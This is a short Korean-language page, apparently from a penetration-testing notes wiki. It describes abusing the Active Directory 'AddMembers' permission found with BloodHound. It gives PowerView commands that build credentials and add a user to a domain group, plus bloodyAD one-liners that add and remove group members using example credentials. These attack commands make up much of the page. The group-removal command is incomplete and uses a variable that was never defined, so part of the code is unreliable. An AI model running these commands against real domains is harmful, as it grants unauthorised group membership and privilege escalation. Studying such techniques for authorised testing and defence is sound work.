AddMembers

도메인 그룹에 대해 Write Members 권한을 가졌다면 블러드하운드에서 AddMembers로 표시됩니다. AddSelf는 스스로를 그룹에 추가/제거할 수 있는 권한인 반면, AddMembers는 다른 사용자를 그룹에 추가/제거할 수 있습니다.

# 개체 정보 변수화
$pwd = ConvertTo-SecureString <PASS> -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential(<DOMAIN\USER>, $pwd)

# 그룹에 사용자 추가
Add-DomainGroupMember -Credential $creds -Identity <Group> -Members <USER> -Verbose

# 그룹 사용자 조회
Get-DomainGroupMember -Identity <Group> | Select <USER>

# 그룹에 사용자 삭제
Remove-DomainGroupMember -Credential $Cred

# 그룹에 멤버 추가/삭제
bloodyAD --host 192.168.1.11 -u user-A -p 'Password123!' add groupMember local-member user-B
bloodyAD --host 192.168.1.11 -u user-A -p 'Password123!' remove groupMember local-member user-B

References

AddMember | The Hacker Recipes

Abusing Active Directory ACLs/ACEsHackTricks

PreviousWriteSPN NextWriteGPO

Last updated 1 day ago

Was this helpful?